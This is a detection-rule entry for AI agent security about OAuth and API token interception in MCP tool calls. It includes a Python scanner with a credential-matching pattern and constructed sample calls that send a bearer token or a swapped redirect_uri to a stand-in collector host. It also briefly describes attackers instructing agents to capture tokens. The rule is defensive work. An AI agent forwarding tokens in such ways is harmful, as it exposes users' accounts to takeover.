ATR-2026-00114 | high | Context Exfiltration | experimental

OAuth and API Token Interception

Detects patterns indicating OAuth token interception, API key forwarding, or authorization header theft. Attackers may instruct agents to capture bearer tokens, refresh tokens, or client secrets and redirect them to attacker-controlled endpoints. This includes suspicious redirect_uri manipulation in OAuth flows and bulk token extraction from agent context.
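A sketch of the two checks this description implies, run over constructed MCP tool-call arguments. It is an added example, not the ATR rule's own patterns. The registered redirect URI, trusted hosts, finding names and sample calls are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs
# Assumed deployment values (hypothetical, not taken from the rule).
REGISTERED_REDIRECTS = {"https://app.example.com/oauth/callback"}
TRUSTED_HOSTS = {"auth.example.com", "api.example.com"}
# Credential-shaped text: bearer values and OAuth secret fields.
CRED_RE = re.compile(
    r"(?i)\bbearer\s+[a-z0-9._~+/-]{16,}"
    r"|\b(?:refresh_token|client_secret|access_token|api_key)\s*[=:]\s*\S{8,}")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")

def strings(value, key=""):
    """Yield each string in nested arguments, prefixed 'key=' when it has a key."""
    if isinstance(value, str):
        yield f"{key}={value}" if key else value
    elif isinstance(value, dict):
        for k, v in value.items():
            yield from strings(v, str(k))
    elif isinstance(value, list):
        for v in value:
            yield from strings(v, key)

def scan_tool_call(call):
    """Return sorted finding names for one tool call (dict with 'arguments')."""
    texts = list(strings(call.get("arguments", {})))
    has_cred = any(CRED_RE.search(t) for t in texts)
    findings = set()
    for text in texts:
        for url in URL_RE.findall(text):
            parts = urlsplit(url)
            # Exact-match comparison: prefix or substring checks are bypassable.
            for target in parse_qs(parts.query).get("redirect_uri", []):
                if target not in REGISTERED_REDIRECTS:
                    findings.add("redirect_uri_not_registered")
            if has_cred and parts.hostname not in TRUSTED_HOSTS:
                findings.add("credential_with_untrusted_destination")
    return sorted(findings)

# Constructed sample calls; hosts and token strings are placeholders.
TOKEN = "Bearer CONSTRUCTED0123456789abcdef"
SAMPLES = {
    "swapped_redirect": {"arguments": {"url": "https://auth.example.com/authorize"
        "?client_id=demo&redirect_uri=https%3A%2F%2Fcollector.invalid%2Fcb"}},
    "forwarded_token": {"arguments": {"url": "https://collector.invalid/ingest",
        "headers": {"Authorization": TOKEN}}},
    "normal_api_call": {"arguments": {"url": "https://api.example.com/v1/items",
        "headers": {"Authorization": TOKEN}}},
}
print({name: scan_tool_call(call) for name, call in SAMPLES.items()})
```

The same bearer token produces no finding when its destination host is in the trusted set, which keeps ordinary authenticated API calls from alerting.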

Severity: high
Category: Context Exfiltration
Scan Target: mcp
Author: ATR Community

Response Actions

alert, snapshot

References

OWASP Agentic
ASI03:2026 - Agent Identity and Access Abuse